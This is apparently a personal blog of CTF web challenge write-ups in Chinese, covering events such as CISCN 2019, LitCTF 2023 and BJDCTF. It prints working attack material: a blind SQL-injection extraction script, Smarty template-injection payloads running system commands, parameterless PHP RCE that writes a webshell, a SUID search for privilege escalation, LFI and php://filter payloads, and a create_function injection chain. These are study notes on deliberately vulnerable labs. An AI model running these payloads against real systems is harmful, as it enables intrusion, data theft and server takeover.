Van

CISCN 2019华北Day2 Web1

2023-05-16T14:18:34.000Z

fuzz发现很多都被过滤了。

发现是空格过滤了，用括号试试，再试试异或，OK

exp

拿之前的异或脚本改一改

# 1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1
import requests
import time

url = "http://node2.anna.nssctf.cn:28140/index.php"
payload = "1^(ascii(substr((select(flag)from(flag)),{},1))>{})^1"
i = 0
mess_ok = "glzjin wants a girlfriend."
# mess_false = "not"
out = ""
while True:
    i += 1
    begin = 32
    end = 128
    tmp = (begin + end) // 2
    while begin < end:
        # url=url+p_dlen.format(i)   错误写法，url会一直增加
        # res=requests.get(url)
        # new_url = url + payload.format(i,chr(tmp))
        new_url = url
        data = {
            "id": payload.format(i, tmp)
        }
        res = requests.post(new_url,data=data)
        # print(res.text)
        # print(new_url)
        # print(begin,end,tmp)
        if res.status_code == 429:
            print("too fast")
            time.sleep(0.5)
        if mess_ok in res.text:
            # print(i)
            begin = tmp + 1
        else:
            end = tmp
        tmp = (begin + end) // 2
        # print(i)
    if begin == 32 or end == 128:
        break
    out += chr(tmp)
    print(out)

NSSCTF{b29f1060-322b-49af-8bb9-a90c4ff6c5a4}

“CISCN2019 华东南赛区 Web11”

2023-05-16T13:29:53.000Z

题目打开有xff头（但nss我试了没有），试着改一改，发现可能是注入点，然后进行注入即可。

看到有操作是直接{{system('cat /flag')}}

不过考点应该是smarty的

{$smarty.version}
Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令。 
如 {php}phpinfo();{/php}
但是3.1.30已废除{php}标签
Smarty的{if}条件判断和PHP的if 非常相似，只是增加了一些特性。全部的PHP条件表达式和函数都可以在if内使用，如*||*,or,&&,and,is_array(), 等等。
{if phpinfo()}{/if}
{if system('ls')}{/if}
{if show_source('/flag')}{/if}

https://www.freebuf.com/column/219913.html

LitCTF2023

2023-05-16T12:59:39.000Z

web 基本做出来了，除了SQL还有session伪造还有无事发生（社工，找GitHub链接，然后在无事发生那个文件里面找）

贴一些链接，感觉比赛作为入门挺好的

https://blog.csdn.net/Aluxian_/article/details/130657256

CISCN2019 华东南赛区 Web4

2023-05-16T11:45:41.000Z

代码

# encoding:utf-8
import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! Read somethings'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
    return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )

查Mac

/read?url=../../../sys/class/net/eth0/address
得到fa:6a:b8:98:32:4a

注意Mac转化要用Python2

然后用Python脚本即可

2023-05-12T15:15:12.834Z

https://blog.csdn.net/weixin_42744595/article/details/130567542

https://mp.weixin.qq.com/s?__biz=MzkzNTQzNTQzMQ==&mid=2247484307&idx=1&sn=f32529f761a8b6675cd98235a4ba45d3&chksm=c2af4e5bf5d8c74d90a7a52881261a540fcea6dcea4e92059043eeb3192eca8f2a35d1fec050&mpshare=1&scene=23&srcid=0511mEgG3O1QQeAUBR2dMAMn&sharer_sharetime=1683815293967&sharer_shareid=cfad11f42ce92eed4932225e44fcc1c0#rd

贵阳数博会2023

2023-04-27T12:39:29.000Z

web

PING

OK：
& 
url编码
BAN:
;
|
`
/
^
~
>
<
?
$


badrequest #

数组也不行
l\s
ls&curl 127.0.0.1 一点延迟回显都没有
可以直接访问flag.php

赛后居然发现是nl flag.php 
无语了

pop

简单的链子

Fastdestruct 破坏掉就行了，把最后一个花括号删了。
https://www.jianshu.com/p/38606134fdd6

May_be


highlight_file(__FILE__);
$a = $_GET['a'];
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $a))  {
    if (!preg_match("/sess|ion|head|ers|file|na|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i",$a)){
        eval($a);
    }else{
        die("May be you should bypass.");
    }
}else{
    die("nonono");
}
?>
nonono

无参数rce

print_r(scandir(current(localeconv())));
var_dump(get_defined_vars());
拿网上的payload打一下，然后可以执行。结果是得提权。
https://blog.csdn.net/Manuffer/article/details/120738755

?a=eval(end(current(get_defined_vars())));&shell=system('ls');

找到权限

find / -perm -u=s -type f 2>/dev/null 
/bin/mount
/bin/cp
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
做多了题目就发现，里面cp可能可以提权

搜了一下cp提权可能得要输入密码，然后思路是写一句话木马，然后蚁剑链接，就可以终端输入密码了。然后就开始坑的地方

题目会把写的一句话木马的一些内容给你换掉，比如$_GET等，还有'单引号，换成空的，而$_GET我猜测只换了一次，那我双写一下试试，结果就写进去了，而'单引号，试了一下，发现会多次置空，那我猜测转义一下，没想到就写进去了。（如何发现的，我cat了我写进去的文件，发现我的马被人偷了一部分。。。然后对照着改的）
下面是payload
?a=eval(end(current(get_defined_vars())));
&shell=$_GET['s'];&s=system("echo '' > 2.php");
写完直接访问2.php，记住蚁剑是用post的，不是用get的。

然后进入终端交互模式，结果发现不能输入密码，提示说什么认证错误还是不允许。查找其他方法。

待学

无参数rce
https://blog.csdn.net/weixin_46330722/article/details/110840156
https://www.cnblogs.com/pursue-security/p/15406272.html#_label1_5
https://cloud.tencent.com/developer/article/1760288
https://blog.csdn.net/Manuffer/article/details/120738755
https://blog.csdn.net/weixin_30568317/article/details/116284685

Hackerconfused


error_reporting(0);
$CanRead = false;
class SFile{
    public $name;
    public function __construct($name) {
        $this->name = $name;
    }
    public function __toString(){
        $num = count(scandir($this->name));
        if($num > 0){
            return 'Not null';
        } else {
            return 'Access the backdoor_******.php.* in [0-f]';
        }
    }
}
class Funny{
    public $name;
    public function __construct($name){
        if(strstr($name, 'backdoor')===false){
            $this->name = $name;
        }else{
            $this->name = 'nohint.txt';
        }
    }
    public function __toString(){
        return $this->name;
    }
    
    public function __destruct(){
        global $CanRead;
        if(strstr($name, 'backdoor')!==false){
            die('try again');
        }
        if($CanRead){
            echo(file_get_contents($this->name));
        }
    }
}
class Fun{
    public $secret = 'nohint.txt';
    public function __wakeup(){
        echo $this->secret;
    }
    
    public function __toString(){
        global $CanRead;
        $CanRead = true;
        return (new Funny($this->secret))->name;
    }
}

if(isset($_GET['p'])){
    unserialize(base64_decode($_GET['p']));
}else{
    show_source(__FILE__);
}

LFI

任意读取文件，看到内网还有主机存活172.16.7.43，扫了一下，发现后面基本访问速度很慢，应该是不让扫的。那得换换思路。时间有限，没找出来。

不太喜欢flask的开发

题目描述：

这个开发以前做java的，不太喜欢flask，那源码中自然会有一些习惯和缺陷了

尝试：

开环境上去就得用户密码。
最后得出来是tomcat/tomcat
连上去后抓包
有Authorization: Basic dG9tY2F0OnRvbWNhdA==
然后response：
you are not our client,please guess our SECRET_KEY and Generating cookies using keys ,then view /search?flag=***** 
直接访问/search?flag=后会
{"msg":"Missing cookie \"access_token_cookie\""}
加上cookie
access_token_cookie=12334 会有no enough segments
猜jwt
access_token_cookie=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIn0.04lcEO1dxtIIBa-Bt_tw8kmO8HpAwqb8BLCHz98S10w
返回{"msg":"Signature verification failed"}
扫不到目录，搜了一下可能是WEB-INF/web.xml泄露，但是也不清楚

完美网站

重定向-抓包

url base64解码得到tupian.png
自己改改，会报错。然后说n是30-10的，自己加上get n
不会报错。
尝试爆破n，可以读出内容。
读一下index.php
然后尝试文件包含，找不到内容。
卡住。没想到tupian.png有信息。winhex分析，最下面有提示一个PHP文件
ffffpq.php
然后读取就行了。


header("Content-type:text/html;charset=utf-8");


echo "å«éå®åäºï¼èµ¶å¿«è®©æï¼?n=30-10,ä»¥åçæ°å¼ã)-_-";
$image=$_GET['img'];

$allow = range(2,20);
shuffle($allow);

if(($_GET['n']==$allow[0])){
$image = base64_decode($image);
$data = base64_encode(file_get_contents($image));
echo "";
}else{
$image = base64_encode("tupian.png");
header("location:/?img=".$image);
}//index.php

一些尝试
读不出来
../../../flag
Flag.php
Flag.txt
读得出来
/etc/passwd
../../../var/www/html/index.php
../../../etc/passwd
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=/etc/passwd
data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
会被解析，返回PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

本来没去分析一下图片，还想着上传临时文件，然后去文件包含呢。。。

notrce


highlight_file(__FILE__);
error_reporting(0);
$c=$_POST['c'];
if(!preg_match("/vi|less|tail|head|od|sh|echo|touch|re|mv|rm|cat|ls|tac|more|cut|curl|wget|base|>|<|`|\*|\\$|\\\/i",$c)){
    exec($c);
}else{
    die("hacker");
}

c=cp /flag 1.txt
无回显rce，直接出了，可能还可以取反绕过
待学学（坑）
https://blog.csdn.net/weixin_46706771/article/details/119031343
https://www.cnblogs.com/pursue-security/p/15406672.html

misc

传说中的小黑

下载下来是一个图片，winhex 正常分析一波，看到有zip，foremost出来，要密码。那么尝试一下伪加密，改了一下没成功。那么寻找密钥，在图片winhex中找到了一段base64的密文，就在压缩包文件头（PK)前面,然后得到密码。解压后得到一大串数据，观察一下，A-Z,0-9,base16(hex)。cyberchef转换一下，然后输出为文件。观察到是JFIF——图片，少了文件头，手动添加一下 FFD8FFE0，然后再打开即可。扫一下二维码。

（拖到winhex中，然后在文件头右键——编辑——粘贴0字节，4个。然后敲即可）

坑：利用一个在线网站得出来的是错误的，换成cyberchef就正常了。（在操作那里拖一个from hex出来。就行了。

[b01lers2020]Life on Mars

2023-04-26T15:15:15.000Z

SQL注入

[GKCTF 2021]easycms

2023-04-26T14:22:24.000Z

搜一下发现

index.php?mode=getconfig
得到版本
version":"7.7
然后继续 访问admin.php
根据提示说五位弱密码，那么直接猜12345 进入

根据网上的步骤来就行了

我是用文件上传加编辑代码的

执行操作的时候甚至还火绒报毒了，还得把火绒关了才行。

然后代码重写之后，修改会不刷新结果。那么去上传文件的地方重新点修改然后直接保存，再刷新主页就得到结果了。（差不多这样）

https://blog.csdn.net/scrawman/article/details/122619270

https://blog.csdn.net/LYJ20010728/article/details/120005727

https://blog.csdn.net/solitudi/article/details/118873773

https://blog.csdn.net/qq_38154820/article/details/106329727

https://blog.csdn.net/LYJ20010728/article/details/120005727

[SUCTF 2018]GetShell

2023-04-26T13:38:21.000Z

黑名单

很多黑名单
字母数字都被ban了好像

文件上传无字母数字

https://blog.csdn.net/qq_43431158/article/details/108089364

https://www.cnblogs.com/Jleixin/p/13289150.html

October2019 Twice SQL Injection

2023-04-26T13:35:33.000Z

二次注入

测试是单引号闭合＋一咧显示

username=1’ union select flag from flag#&password=1

[ISITDTU 2019]EasyPHP

2023-04-25T16:16:19.000Z


highlight_file(__FILE__);

$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
    die('rosé will not do it');

if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
    die('you are so close, omg');

eval($_);
?>

payload:

(~%8F%97%8F%96%91%99%90)();

[极客大挑战 2020]Greatphp

2023-04-25T16:08:23.000Z

反序列化

 
error_reporting(0);
class SYCLOVER {
    public $syc;
    public $lover;

    public function __wakeup(){
        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
           if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
               eval($this->syc);
           } else {
               die("Try Hard !!");
           }
           
        }
    }
}

if (isset($_GET['great'])){
    unserialize($_GET['great']);
} else {
    highlight_file(__FILE__);
}

?>

EasyBypass

2023-04-25T16:07:07.000Z



highlight_file(__FILE__);

$comm1 = $_GET['comm1'];
$comm2 = $_GET['comm2'];


if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
    $comm1 = "";
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))
    $comm2 = "";

$flag = "#flag in /flag";

$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';

$cmd = "file $comm1 $comm2";
system($cmd);
?>

[SCTF2019]Flag Shop

2023-04-25T15:50:22.000Z

新东西

ruby注入

还以为是js

本来想爆破jwt的，结果有robots.txt，里面提示得到了源码。

require 'sinatra'
require 'sinatra/cookies'
require 'sinatra/json'
require 'jwt'
require 'securerandom'
require 'erb'

set :public_folder, File.dirname(__FILE__) + '/static'

FLAGPRICE = 1000000000000000000000000000
ENV["SECRET"] = SecureRandom.hex(64)

configure do
  enable :logging
  file = File.new(File.dirname(__FILE__) + '/../log/http.log',"a+")
  file.sync = true
  use Rack::CommonLogger, file
end

get "/" do
  redirect '/shop', 302
end

get "/filebak" do
  content_type :text
  erb IO.binread __FILE__
end

get "/api/auth" do
  payload = { uid: SecureRandom.uuid , jkl: 20}
  auth = JWT.encode payload,ENV["SECRET"] , 'HS256'
  cookies[:auth] = auth
end

get "/api/info" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  json({uid: auth[0]["uid"],jkl: auth[0]["jkl"]})
end

get "/shop" do
  erb :shop
end

get "/work" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  auth = auth[0]
  unless params[:SECRET].nil?
    if ENV["SECRET"].match("#{params[:SECRET].match(/[0-9a-z]+/)}")
      puts ENV["FLAG"]
    end
  end

  if params[:do] == "#{params[:name][0,7]} is working" then

    auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    ERB::new("").result

  end
end

post "/shop" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }

  if auth[0]["jkl"] < FLAGPRICE then

    json({title: "error",message: "no enough jkl"})
  else

    auth << {flag: ENV["FLAG"]}
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    json({title: "success",message: "jkl is good thing"})
  end
end


def islogin
  if cookies[:auth].nil? then
    redirect to('/shop')
  end
end

新东西，那之后再来做。

https://www.anquanke.com/post/id/86867

[WMCTF2020]Make PHP Great Again

2023-04-25T15:12:53.000Z

require_once绕过，直接找网上的payload

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

原理

https://www.anquanke.com/post/id/213235

[极客大挑战 2020]Roamphp1-Welcome

2023-04-25T15:06:16.000Z

一顿操作没发现什么，抓包，发现不允许get，改一下post就有源码了。

sha1强等于绕过。用数组绕过即可

roam1[]=1&roam2[]=2

[MRCTF2020]Ezaudit

2023-04-25T14:31:03.000Z

打开得到一个类似官网之类的网站

一顿操作无果后，扫一下，发现有www.zip

而里面有index.php，源码得到了，


header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
}
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥，咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }

    else{
        if($Private_key === '************'){
        $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
        $link=mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $result = mysql_query($getuser);
        while($row=mysql_fetch_assoc($result)){
            echo "

".$row["username"]."

".$row["flag"]."

";
}
}
}

}
// genarate public_key
function public_key($length = 16) {
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$public_key = '';
for ( $i = 0; $i < $length; $i++ )
$public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
return $public_key;
}

//genarate private_key
function private_key($length = 12) {
$strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$private_key = '';
for ( $i = 0; $i < $length; $i++ )
$private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
return $private_key;
}
$Public_key = public_key();
//$Public_key = KVQP0LdJKRaV3n9D how to get crispr's private_key???

简单分析一下就是，利用mt_rand的随机数漏洞

搜一下就行了，之前也做过类似的，所以直接做。

爆出随机数后，利用脚本得出私钥。

if($Private_key === '************'){
       $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
       $link=mysql_connect("localhost","root","root");
       mysql_select_db("test",$link);
       $result = mysql_query($getuser);
       while($row=mysql_fetch_assoc($result)){
           echo "

".$row["username"]."

".$row["flag"]."

看这一段，得出了用户名，然后密码不知道，但是我们可以简单审计一下发现，用万能密码绕过。1’ or 1=1#

然后登录即可

XuNhoueCDCGc 私钥
注意伪随机数制作与爆破过程得与题目的php版本一致。

[GXYCTF2019]StrongestMind

2023-04-23T16:45:44.000Z

python 脚本编写

边敲边改
import time
from requests import *
import re
url="http://5ee91e70-c1b8-4921-84fb-34dda71ee977.node4.buuoj.cn:81/"
s=session()
res = s.get(url=url)
res.encoding = "UTF-8"
for i in range(1001):
    print(res.text)
    match=re.findall("
(.*)
",res.text)
    # print(match)
    # print(match[0])
    rem=re.findall("
[0-9].*
",match[0])
    text=rem[0].replace("
","")
# print(rem[0].replace("
",""))
# print(text)
# num=re.findall("[0-9]*",text)
# print(num)
# num1=num[0]
# num2=num[4]
# how=re.findall("\+|\-",text)
# print(how[0])
# out=int(num1)+int(num2)
# print(out)
    all=eval(text)
    print(eval(text))
    data={
        "answer":all
    }
    res=s.post(url=url,data=data)#注意由于成功后也会返回算术式子，所以得要将res更新，才能更新值。否则一直算错
    res.encoding="UTF-8"
    print(res.text)
    time.sleep(0.3)
    flag=re.findall("flag{.*",res.text)
    print(i)
    if flag:
        print(flag)

[HFCTF2020]JustEscape

2023-04-23T16:42:23.000Z

不会js，留个坑

访问run.php

 
if( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) {
    $code = $_GET['code'];
    echo eval(code);
} else {
    highlight_file(__FILE__);
}
?>

nodejs

大概就是利用现成的poc，然后由于有关键字，所以利用js的特性进行关键字绕过

prototype变成`${`${`prototyp`}e`}`
${`${`prototyp`}e`}
`p`,`r`,`o`,`t`,`o`,`t`,`y`,`p`,`e`

https://z3ratu1.github.io/%5BHFCTF2020%5DJustEscape.html

https://blog.csdn.net/qq_43478096/article/details/109231567

[BJDCTF]2020EzPHP

2023-04-22T14:51:57.000Z

F12

base32解码

1nD3x.php

源码


highlight_file(__FILE__);
error_reporting(0); 

$file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';

echo "
This is a very simple challenge and if you solve it I will give you a flag. Good Luck!
";

if($_SERVER) { 
    if (
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
        )  
        die('You seem to want to do something bad?'); 
}

if (!preg_match('/http|https/i', $_GET['file'])) {
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { 
        $file = $_GET["file"]; 
        echo "Neeeeee! Good Job!
";
    } 
} else die('fxck you! What do you want to do ?!');

if($_REQUEST) { 
    foreach($_REQUEST as $value) { 
        if(preg_match('/[a-zA-Z]/i', $value))  
            die('fxck you! I hate English!'); 
    } 
} 

if (file_get_contents($file) !== 'debu_debu_aqua')
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?
");


if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
    extract($_GET["flag"]);
    echo "Very good! you know my password. But what is flag?
";
} else{
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

if(preg_match('/^[a-z0-9]*$/isD', $code) || 
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { 
    die("
Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="); 
} else { 
    include "flag.php";
    $code('', $arg); 
} ?>
This is a very simple challenge and if you solve it I will give you a flag. Good Luck!
fxck you! I hate English!

分析

$_SERVER[“QUERY_STRING”]

http://www.xxx.com/index.php?p=222&q=u
$_SERVER["QUERY_STRING"] = “p=222&q=u”
不能有?shana=&passwd=

可以url编码绕过，因为$_SERVER[‘QUERY_STRING’]在读取url时并不会对url进行解码，而$_GET['x']是会进行url解码的，所以我们要把可能出现在黑名单的字符串进行url编码后再传入

preg_match

preg_match(‘/^aqua_is_cute$/‘, $_GET[‘debu’])要求debu的值满足正则/^aqua_is_cute$/，^和$用来表示开头和结尾
$_GET[‘debu’] !== ‘aqua_is_cute’要求debu的值不能强等于’aqua_is_cute’

在末尾加%0a绕过匹配

绕过$_REQUEST的字母匹配

$_REQUEST包括所有以post或者get方式传入的变量，如果含有字母则无法通过，但我们所有的参数构造都离不开字母。
这里的绕过方法主要利用$_REQUEST特性，变量post值会优先于get，我们只要在get传入变量后，再用post方式传入数字值进行覆盖即可

file_get_contents

这个data协议

sha1强比较绕过

数组绕过，或者强碰撞

create_function()注入


$afunc = create_function('$a, $b','return ($a+$b);');
echo $afunc(1,2);
//输出3
?>
等价于

function afunc($a,$b)
{
return $a+$b;
}
echo afunc(1,2);
//输出3
?>
注入方式：
$code参数可控，可能会存在代码注入

$aFunc = create_function('$a, $b', 'return($a+$b);}eval($_POST['cmd']);//');

function aFunc($a, $b)
{
return $a+$b;
}
eval($_POST['cmd']);//}
?>
即$code=}function;//
}闭合前面的，然后写语句，最后//来注释掉后面的内容。

怎么实际操作呢（坑）

extract函数是一个关联数组。此函数会将键名当作变量名，值作为变量的值

extract($_GET["flag"]);
那我们构造
flag['code']=&flag['arg']=
即可将code键名作为变量名，然后值作为变量的值。（个人的分析）

arg的选择

由于过滤很严格，黑名单，那么可以试试找替代的函数 get_defined_vars()直接输出所有变量

include "flag.php";，包含了flag.php文件，代表可以使用里面的变量。所以要想办法在不指定变量名称的情况下输出变量的值，可以想到：是否存在一个函数，能输出所有变量的值？刚好get_defined_vars()用来输出所有变量和值。

然后得到了假的flag，真正的flag在rea1fl4g.php

再看过滤的

过滤了include 还能用require
过滤了引号，可以使用那些参数可以不加引号的函数，require()代替require " "
过滤了flag，可以base64编码

即利用require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php)
但filter被过滤了。用~绕过正则

echo urlencode(~'php://filter/read=convert.base64-encode/resource=rea1fl4g.php');
得到
%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F
最终
require(~(%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F))

payload

file=data://text/plain,debu_debu_aqua&debu=aqua_is_cute%oa&shana[]=1&passwd[]=2
%66%69%6c%65=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2

注意%0a、[]、&、=不用url编码，

后续的
$code=create_function&arg=}var_dump(get_defined_vars());//
fl%61g[c%6fde]=create_function&fl%61g[%61rg]=}var_dump(get_defined_vars());//
以下
file=data://text/plain,debu_debu_aqua&debu=aqua_is_cute%oa&shana[]=1&passwd[]=2
%66%69%6c%65=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&fl%61g[c%6fde]=create_function&fl%61g[%61rg]=}var_dump(get_defined_vars());//
同时post debu=1&file=1
以下
get:
?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%66%69%6c%65=%64%61%74%61%3a%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67%5b%61%72%67%5d=}require(~(%8f%97%8f%c5%d0%d0%99%96%93%8b%9a%8d%d0%8d%9a%9e%9b%c2%9c%90%91%89%9a%8d%8b%d1%9d%9e%8c%9a%c9%cb%d2%9a%91%9c%90%9b%9a%d0%8d%9a%8c%90%8a%8d%9c%9a%c2%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f));//&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e
没urlencode前:
debu=aqua_is_cute%0a&file=data:,debu_debu_aqua&shana[]=1&passwd[]=2&flag[arg%5d=}require(~(%8f%97%8f%c5%d0%d0%99%96%93%8b%9a%8d%d0%8d%9a%9e%9b%c2%9c%90%91%89%9a%8d%8b%d1%9d%9e%8c%9a%c9%cb%d2%9a%91%9c%90%9b%9a%d0%8d%9a%8c%90%8a%8d%9c%9a%c2%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f));//&flag[code]=create_functio%6e

post:
debu=&file=

tips：

注意%0a、[]、&、=不用url编码，

可以写未url的payload，然后再在burp里面url一下，就会清楚方便一点。

burp发的会没回显，还是得hackbar，因为会url一层吧

https://blog.csdn.net/weixin_51804748/article/details/121330064